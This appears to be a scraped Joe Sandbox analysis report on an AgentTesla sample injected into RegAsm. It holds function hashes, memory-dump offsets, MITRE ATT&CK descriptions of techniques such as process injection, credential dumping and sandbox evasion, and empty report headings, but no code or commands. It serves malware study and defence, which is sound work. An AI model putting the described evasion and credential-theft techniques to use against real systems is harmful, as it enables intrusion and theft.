Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: abef17a5f901cd2faf5c61106d5c25ba991ca07b16f89144e23011a07d4910ab
Instruction ID: 83f30cc8836fed39d09c882b41dde679d3f7a9df1ed259b2b37552db895802db
Opcode Fuzzy Hash: abef17a5f901cd2faf5c61106d5c25ba991ca07b16f89144e23011a07d4910ab
Instruction Fuzzy Hash: 57412DE2A09771CFCB2F971C889476E7BE0BF66211F164168D8578B501D7749420DBA3

Uniqueness

Uniqueness Score: 1.31%

Function 22CF330B, Relevance: 1.5, Strings: 1, Instructions: 261UNIQUE

Download Yara Rule

Strings

<, xrefs: 22CF36F6

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-3994965447
Opcode ID: 6f460bdce8941db3bb0f476fc87dc2d34dde719c8b0627835b9a59be52816f63
Instruction ID: dc6b70bb6b7643036546f9567d73dc7d10018dee56410b785272aec807c0eea8
Opcode Fuzzy Hash: 6f460bdce8941db3bb0f476fc87dc2d34dde719c8b0627835b9a59be52816f63
Instruction Fuzzy Hash: F0B13075A006198FDB65CF28C990B9AB7B7AF88310F1082E5C509A7351DB35AE96CF50

Uniqueness

Uniqueness Score: 100.00%

Function 22CF392D, Relevance: 1.4, Strings: 1, Instructions: 186UNIQUE

Download Yara Rule

Strings

<, xrefs: 22CF3B13

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-3441647273
Opcode ID: bb1c841e1c258c4ee545efe2085a82695da98f65f0518232055f5eb4188bf69c
Instruction ID: e0d7890a4b6af1fcba6e60bb4ead758d8fdb702e699055389eb1a893d585437b
Opcode Fuzzy Hash: bb1c841e1c258c4ee545efe2085a82695da98f65f0518232055f5eb4188bf69c
Instruction Fuzzy Hash: D7817D75A00669DFDB64CF24CD94B9AB7F2EB88310F0081EAD909AB350DB349E95CF40

Uniqueness

Uniqueness Score: 100.00%

Function 22CFB078, Relevance: 1.4, Strings: 1, Instructions: 126UNIQUE

Download Yara Rule

Strings

`O=s, xrefs: 22CFB078

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: `O=s
API String ID: 0-3259009754
Opcode ID: f22d3e717086cd608e8de7ca8f09639eddd7c2a17c8e4b4b42b0a9bb9635861d
Instruction ID: ba9ff89238ddad90837db95139dbd989553adb4b30efc909bbce00a74c30cfcf
Opcode Fuzzy Hash: f22d3e717086cd608e8de7ca8f09639eddd7c2a17c8e4b4b42b0a9bb9635861d
Instruction Fuzzy Hash: DD519074E01618CFDB54CF69C980A89FBF2FF88304F65869AD408AB255DB309E82CF51

Uniqueness

Uniqueness Score: 100.00%

Function 22CF69F0, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37594595d2c780b53467db654768a03e04515145d26ed55f3ba457c982ad2f11
Instruction ID: a1cbae0e6e9438be11f282c5b68d5b6b68f8f21dd817fd3e95af7cff74895da3
Opcode Fuzzy Hash: 37594595d2c780b53467db654768a03e04515145d26ed55f3ba457c982ad2f11
Instruction Fuzzy Hash: EFE13770A00309CFD744DF64C684A49FBB2BF84354F66C66AD828AB365CB35ED46CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22CF6B5E, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0deef0fa9cb55b4fa4d836bb6ceda15229018cd3b0c423cc72b29253de81f1
Instruction ID: 3d56639cbfe3304779c5f8c8bc4c96dbc045ccff9f367b6bcbdb34c7cc6a0bd6
Opcode Fuzzy Hash: 4d0deef0fa9cb55b4fa4d836bb6ceda15229018cd3b0c423cc72b29253de81f1
Instruction Fuzzy Hash: A9D11570A00309CFC744DF64C684A49FBB2BF84354F66C66AD828AB366C735ED46CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22CFC49A, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4a20b3adcdfdbbb6a34c091365bdde8f2539e3951d94c1c4b55582844e183d
Instruction ID: 000fe83307b047585d775f24f77a85a54c4186d0e3ff116ceac5b3adc44c4ff7
Opcode Fuzzy Hash: 9e4a20b3adcdfdbbb6a34c091365bdde8f2539e3951d94c1c4b55582844e183d
Instruction Fuzzy Hash: 5DB15E31F002098BDB85DBB8C59469EB7F2EF84344F24892AD509DB395DB35EE42CB81

Uniqueness

Uniqueness Score: 0.00%

Function 22DE4ABF, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee8abf3cf08dc462260f67a4f9ef46cff057e05810944eed8191e57bda680cf
Instruction ID: 8841edd2267ac1ee03b86edd6bc324341b9431cbc0934d7e202935a248c34b5d
Opcode Fuzzy Hash: eee8abf3cf08dc462260f67a4f9ef46cff057e05810944eed8191e57bda680cf
Instruction Fuzzy Hash: 18C14D30A102198FD755DF28C980B9AB7B6BF88304F15C599D90EAB365DB30EE85CF91

Uniqueness

Uniqueness Score: 0.00%

Function 01129F1B, Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 4c2ea01a40c1e91895dc12dc866853d47b36865d810a6da0d3fb6401d5c8c21e
Instruction ID: 52a6068f6b05dab12de850ed25e329f066566a42a2bc1e73a444832654e5544f
Opcode Fuzzy Hash: 4c2ea01a40c1e91895dc12dc866853d47b36865d810a6da0d3fb6401d5c8c21e
Instruction Fuzzy Hash: 0981B5609083A2CEDB3DCF28E4D4B29BB91DF52210F15C69AD5968BAD7C37484928723

Uniqueness

Uniqueness Score: 0.00%

Function 22CFA427, Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487e0372cea372b0feff319a2d147e505b62a2216dd368e474c20b7ef1455936
Instruction ID: 7dafb9b826ba97cd43c7922520275adc7ba3a49e1eac875f1fd09440dffd4625
Opcode Fuzzy Hash: 487e0372cea372b0feff319a2d147e505b62a2216dd368e474c20b7ef1455936
Instruction Fuzzy Hash: 42518074A15668CFDB54CF69C980B89FBF2FF88300F65869AD408AB254DB309E85CF51

Uniqueness

Uniqueness Score: 0.00%

Function 22CFBC20, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631383f1dcb1d28603f0a6a456babce04f1af8269e7f4a1cf0e2fd0303c41654
Instruction ID: 7f809369df4cef55930876eb2b2712c87b602baf309fc0cdccfc59c503dc854c
Opcode Fuzzy Hash: 631383f1dcb1d28603f0a6a456babce04f1af8269e7f4a1cf0e2fd0303c41654
Instruction Fuzzy Hash: 1A518F74E05618CFDB54CF69C980A89F7F2FF88300F65869AD408AB255DB309E82CF51

Uniqueness

Uniqueness Score: 0.00%

Function 01127200, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77b4b009f80651de9a6f88e9ff38f93de43e2d96c1142492bc0835f7e1f60a4
Instruction ID: e458e67ef375e06032daa6b9cc49626e2e02ca7340865f3c29d24ccce0207f27
Opcode Fuzzy Hash: e77b4b009f80651de9a6f88e9ff38f93de43e2d96c1142492bc0835f7e1f60a4
Instruction Fuzzy Hash: 883171D291FBF1CDCF27E62841A87073FB05AB310278A42C8D0934F94AE5985525EBB3

Uniqueness

Uniqueness Score: 0.00%

Function 01124279, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e0d81cfa36b8d6455375b4d881cbc53ff231d8189d7031a3d425a35d465833
Instruction ID: 10a039205d4b84c1c70e3bb957cf8dd89f3825fd163c4719afea83ee2f0a9bdf
Opcode Fuzzy Hash: 15e0d81cfa36b8d6455375b4d881cbc53ff231d8189d7031a3d425a35d465833
Instruction Fuzzy Hash: 33F09DD290EBF089DF23E62C54E87067FA05AB350678A06D8D0835F90AE1985460EBB3

Uniqueness

Uniqueness Score: 0.00%

Function 01128700, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7553caa04e54b50758abffb147684002eff81fd55df2002b762db06bd8023308
Instruction ID: 334ab77b16de75c792edf1b745242be3ae825588dab1a1943ffca3851b432542
Opcode Fuzzy Hash: 7553caa04e54b50758abffb147684002eff81fd55df2002b762db06bd8023308
Instruction Fuzzy Hash: 32F01775708A21CFDB1DDA58C2E0B2AB3E1AB94700F1B8565D6028B561D768E870C653

Uniqueness

Uniqueness Score: 0.00%

Function 01124553, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed502c05802ba7458a70df8f6d5b063f5796dacadfcdfd8410e7ea3205e7002
Instruction ID: 2aa0175db9638778f874cbd4f745b0096c1734e8aaf44771288c67fed06df1d4
Opcode Fuzzy Hash: 3ed502c05802ba7458a70df8f6d5b063f5796dacadfcdfd8410e7ea3205e7002
Instruction Fuzzy Hash: 56D0C911F0043409F76A41BE56503746C83C7C9250FE0C278A7788694CE5A85AD202E8

Uniqueness

Uniqueness Score: 0.00%

Function 0112728F, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ff910d6fe8884bd25b484c0083f339468fb28ac2834c795c2593b725f3fd38
Instruction ID: 91b85ead5d086becfe2b0a3d2f7a99e2cc841f0fba8aae6cf953ae4508157885
Opcode Fuzzy Hash: 39ff910d6fe8884bd25b484c0083f339468fb28ac2834c795c2593b725f3fd38
Instruction Fuzzy Hash: 4BC0927026A461CFDA8ECB1AC681E2373B4BB22710B4328C0F4128BBD1C364EE20C906

Uniqueness

Uniqueness Score: 0.00%

Function 01124277, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf805806360e73349fb3a49f37813facbafbc5df436a800e689d6048333b1fd3
Instruction ID: 168b100ba1b6b1d64cf9ce8568be6603ad238fb6a77a9b343d1f93603c776353
Opcode Fuzzy Hash: cf805806360e73349fb3a49f37813facbafbc5df436a800e689d6048333b1fd3
Instruction Fuzzy Hash: A2C04CB29114D08BEF15DA0CE4C1B4473A0EB06A48F4518E0E016DFA52D31CED50CB01

Uniqueness

Uniqueness Score: 0.00%

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as Remote Desktop Protocol , instead of through a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command , or other potentially difficult to monitor interactions.
Tactics:	Execution
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas` . Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information from learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information from a target.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report bF7H5z6B1q.exe

Overview

General Information

Detection

Confidence

Classification Spiderchart

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Malware Configuration

Threatname: Agenttesla

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 0042DF4F, Relevance: 80.9, APIs: 41, Strings: 5, Instructions: 385
UNIQUE

Function 00422411, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 293
memoryUNIQUE

Function 0042E597, Relevance: 75.6, APIs: 41, Strings: 2, Instructions: 337
UNIQUE

Function 0042ECDD, Relevance: 54.5, APIs: 28, Strings: 3, Instructions: 265
UNIQUE

Function 00431385, Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 416
UNIQUE

Function 0042EA63, Relevance: 30.2, APIs: 20, Instructions: 163
UNIQUE

Function 0042D000, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Function 004312D0, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Function 00430884, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Function 0042D94F, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Function 0042C7D3, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Function 004309E7, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Function 0042D80C, Relevance: 7.5, APIs: 5, Instructions: 29
UNIQUE

Function 0042C45C, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Function 0042DEE3, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Function 0042CD14, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Function 004303FE, Relevance: 7.5, APIs: 5, Instructions: 28
UNIQUE

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre